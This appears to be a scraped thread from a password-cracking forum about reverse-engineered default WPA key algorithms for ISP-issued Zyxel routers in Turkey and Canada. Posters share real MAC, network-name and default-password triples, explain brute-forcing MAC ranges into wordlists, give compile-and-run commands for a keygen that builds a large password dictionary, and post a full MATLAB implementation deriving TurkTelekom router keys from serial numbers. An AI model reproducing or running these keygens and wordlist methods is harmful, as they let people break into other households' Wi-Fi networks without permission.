Crypto-Anarchist84
New member
Is it time yet? ? I've been really patient.
Unpublished WPA key algorithms
- Thread starter gpuhash_me
- Start date
elmasatanzenci
Active member
For turktelekom zyxel modems key algorithm uses the serial number, not the mac. it also could be the case for videotron. maybe even close to tt algo.
gurgen
Active member
could someone rewrite this code in python?
medium.com
github.com
Reversing Zyxel VMG8823-B50B WPA algorithm generation for fun
After some issues with my old ISP, few months ago, I decided to switch to ********** which gave me a Zyxel VMG8823-B50B router and…
GitHub - luc10/zykgen: Zyxel VMG8823-B50B default WPA keygen
Zyxel VMG8823-B50B default WPA keygen. Contribute to luc10/zykgen development by creating an account on GitHub.
github.com
This did not worked exactly, worked but results was wrong.
For example i have a few fc4ae9 router stock passwords.
mac = 'fc4ae9441327'
I checked fc4ae9441327 on this algo it created this pass = f7a9fae6 but this was wrong because true pass is c2c357a5
I tried 5 or 6 different macs.
Can you help me please where i made a mistake?
Thanks
elmasatanzenci
Active member
you should use the cm mac. not the wan or wlan mac. it works as it should.
Thanks for your reply.
How can calculate CM? What is it?
For example i have some infos:
fc4ae9441327 NetMASTER Uydunet-1324 --- real passes-> c2c357a5
fc4ae971b308 Kablonet Netmaster-B303-G --- real passes-> 4c14a73c
fc4ae9b041d1 TURKSAT-KABLONET-41CC-2.4G --- real passes-> 5592499e
How can i verify theese with that python file?
i found this
Thanks for your help
--------------------------------------------------------------------------------------
I solved the system but i have a problem.
From Wan Mac it worked. fc4ae964f113 mac it gives the true pass. 42a371c5 but when i tried cm mac fc4ae964f111 it gives me wrong pass.
Can you give me info about cmac and wlan mac?
How can i found real wlan mac? in some sites it writes that wlan mac is consecutive.
But in this example Cm mac fc4ae964F111 Wan mac fc4ae964F113
How can i find right wan mac?
And why did you say use Cm mac?
Thanks
Attachments
-
29003b1b1c6607c1d77cc81a7fbea432.jpg
elmasatanzenci
Active member
well you cant calculator real cm mac from the wan or wlan mac. best thing you can do is make a wordlist from fc4ae9000000 to fc4ae9ffffff. and use that instead.Thanks for your reply.
How can calculate CM? What is it?
For example i have some infos:
fc4ae9441327 NetMASTER Uydunet-1324 --- real passes-> c2c357a5
fc4ae971b308 Kablonet Netmaster-B303-G --- real passes-> 4c14a73c
fc4ae9b041d1 TURKSAT-KABLONET-41CC-2.4G --- real passes-> 5592499e
How can i verify theese with that python file?
i found this
But did not understand?
Thanks for your help
elmasatanzenci
Active member
sorry my bad. i meant wan mac. cm mac was for the wifi name calculation i wasx confused.. u need to use wan mac but you cant know wan mac from the wlan mac exactly. so u should make a wordlist to make sure you have it all.
Thanks for your all replies.
My english is not so good but I want to follow the rules that i want to write in english.
I want to share this and i have a question
First of all in these examples
fc4ae9441327 NetMASTER Uydunet-1324 --- real passes-> c2c357a5
fc4ae971b308 Kablonet Netmaster-B303-G --- real passes-> 4c14a73c
only last digit changes! in the first example wireless name is 1324 and also last 4 digit of mac is 1327 so first 3 digits are same. In this example WAN MAC is between 24-27 i tested a few time in different wirelesses
But in third example fc4ae9b041d1 TURKSAT-KABLONET-41CC-2.4G last 2 digits are different. How can i solve this you said that i shold make a list but how?
In the quete the writer says 256 possibilites.
fc4ae9b041?h?h like this? I wonder this. And how can edit netmaster-psk.py? For example I need fc4ae9b041?h?h how can extract passes in an out.txt file? We need the modify netmaster-psk.py
Thanks for all
SubZero5
Active member
Nowadays I see some NetMaster modems with changed MAC addresses...
I think a new firmware is pushed and the announced MacIDs are somehow shifted. I have some sample data but I am unavailable to analyze a firmware for an exact change methodology.
FC:4A:E9:xx:xx:xx became 18:48:59:yy:yy:yy
I think a new firmware is pushed and the announced MacIDs are somehow shifted. I have some sample data but I am unavailable to analyze a firmware for an exact change methodology.
FC:4A:E9:xx:xx:xx became 18:48:59:yy:yy:yy
Hi i have a problem and i hope someone can help me.
I tried this method.
gen_ttnet_zyxel gcc -Ofast -o gen_ttnet_zyxel gen_ttnet_zyxel.c md5-fast-x8664.S
I have kali linux's lastest version.
I tried to create only 160Y! so i used this line static char* prefixes[] = {"160Y"};
chmod +x gen_ttnet_zyxel
then
./gen_ttnet_zyxel > zyxelwordlist.dic
I created a dictionary which was about 750 MB
But this list does not have all keys. I checked 10 times! i compiled 10 times to find what the problem is.
5D5276a1f1332 and 08134838433Ff passes must be in it but the created dictionary does not have them!
because 5D5276a1f1332 and 08134838433Ff passes are S160Y router's keys!
What is the problem do you think? Why the dict does not have right passwords?
I used this file
Unpublished WPA key algorithms
Playing with TTNET_ZyXEL algo we accidentally discovered that Canadian ISP Telus use basically the same algo for their ZyXEL routers (with few differences), they generate 10 lower hex string then correct 0 and 1 chars to chars outside a-f region. Attached PoC offers only partial coverage because...
forum.hashkiller.io
Thanks for your answers.
How many more years......
I've converted the turktelecom keygen to matlab, so if you want to build your own python version it's pretty straight forward to do so. Added a few examples, so you can see if your code is on the right track.
Code:
function key=turkey_zyxel(sn)
% converted from c originally by gpuhash_me on hashkiller
% ref: https://forum.hashkiller.io/index.php?threads/unpublished-wpa-key-algorithms.19944/post-240582
% Default ESSID is TTNET_ZyXEL_XXXX or TurkTelecom_XXXXX
% Zyxel VMG3312-B10B and VGM3313-B10A
if nargin<1 % default serial number if none provided
sn='S150Y13068675';
end
junk=['agnahaakeaksalmaltalvandanearmaskaspattbagbakbiebilbitblableblib'...
'lyboabodbokbolbomborbrabrobrubudbuedaldamdegderdetdindisdraduedu'...
'kdundypeggeieeikelgelvemueneengennertesseteettfeifemfilfinflofly'...
'forfotfrafrifusfyrgengirglagregrogrygulhaihamhanhavheihelherhith'...
'ivhoshovhuehukhunhushvaideildileinnionisejagjegjetjodjusjuvkaika'...
'mkankarkleklikloknaknekokkorkrokrykulkunkurladlaglamlavletlimlin'...
'livlomloslovluelunlurlutlydlynlyrlysmaimalmatmedmegmelmenmermilm'...
'inmotmurmyemykmyrnamnednesnoknyenysoboobsoddodeoppordormoseospos'...
'sostovnpaiparpekpenpepperpippopradrakramrarrasremrenrevrikrimrir'...
'risrivromroprorrosrovrursagsaksalsausegseiselsensessilsinsivsjus'...
'jyskiskoskysmisnesnusolsomsotspastistosumsussydsylsynsyvtaktalta'...
'mtautidtietiltjatogtomtretuetunturukeullulvungurourtutevarvedveg'...
'veivelvevvidvikvisvriyreyte'];
MD5_hash=hasher(sn,'MD5'); % results in 16 int values but in hex f49ab8d6ce27819152c99e926d1f1372
p='';
sum=0;
for n=1:16,
byte=MD5_hash(n);
c1=dec2hex(bitshift(byte,-4)); % High nibble converted to upper case hex by bitshift 4 => divide by 16
c2=lower(dec2hex(mod(byte,16))); % low nibble converted to lower case hex
if c1=='0' % remove leading zero by copying 2nd char into 1st.
c1=c2;
end
p=[p c1 c2];
sum=sum+double(c1)+double(c2); %adds ASCII values together
end
% sum is 2006 for the default SN
% p would be F49aB8D6Ce27819152C99e926d1f1372
i=mod(sum,265);
if bitand(sum,1) %check sum is odd
s1=[lower(dec2hex(double(junk(1+i*3)),2)) lower(dec2hex(double(junk(2+i*3)),2)) lower(dec2hex(double(junk(3+i*3)),2))];
else
s1=[dec2hex(double(junk(1+i*3)),2) dec2hex(double(junk(2+i*3)),2) dec2hex(double(junk(3+i*3)),2)];
end
%s1 = '6D7572' for default serial number (upper case hex conversion from the ascii values of the letters picked out from junk
s2=[p(1) s1(1:2) p(2:3) s1(3:4) p(4:6) s1(5:6) p(7:end)]; % weird alternating stitching of the hex digest and the junk hex
%s2 is F6D4975aB872D6Ce27819152C99e926d1f1372 for the default, note the mixed case
MD5_hash2=hasher(s2,'MD5');
hex_digest='';
for n=1:16,
hex_byte=dec2hex(MD5_hash2(n),2); %force all upper case
if hex_byte(1)=='0'
hex_byte(1)=hex_byte(2); % copy next char over if leading zero;
end
hex_digest=[hex_digest hex_byte];
end
for n=2:2:32
hex_digest(n)=lower(hex_digest(n)); % alternate lower case and upper case
end
%default hash = 52AeC8568b91E1DcBcA5142e95Fd31F5
%correct password for default sn = 1DcBcA5142e95
key=hex_digest(14:26); % select the key from the 14th char to the 26th
Last edited by a moderator:
Thanks Dawbs. Here's the matlab conversion of Zykgen (keygen for the Zyxel VMG8823-B50B).
Note that I've completely gotten rid of the bibbidi bobbidi boo functions and some others after I figured out what they were actually doing. Again should be pretty easy to convert to python if you are so inclined. But easier to handle than the GOlang it was written in.
Note that I've completely gotten rid of the bibbidi bobbidi boo functions and some others after I figured out what they were actually doing. Again should be pretty easy to convert to python if you are so inclined. But easier to handle than the GOlang it was written in.
If anybody still has a copy of the gen_telus.py that was attached on message 21 please send it to me. I want to see what else ZyXel had up there sleaves when it comes to generating those passwords.
forum.hashkiller.io
Unpublished WPA key algorithms
Playing with TTNET_ZyXEL algo we accidentally discovered that Canadian ISP Telus use basically the same algo for their ZyXEL routers (with few differences), they generate 10 lower hex string then correct 0 and 1 chars to chars outside a-f region. Attached PoC offers only partial coverage because...
forum.hashkiller.io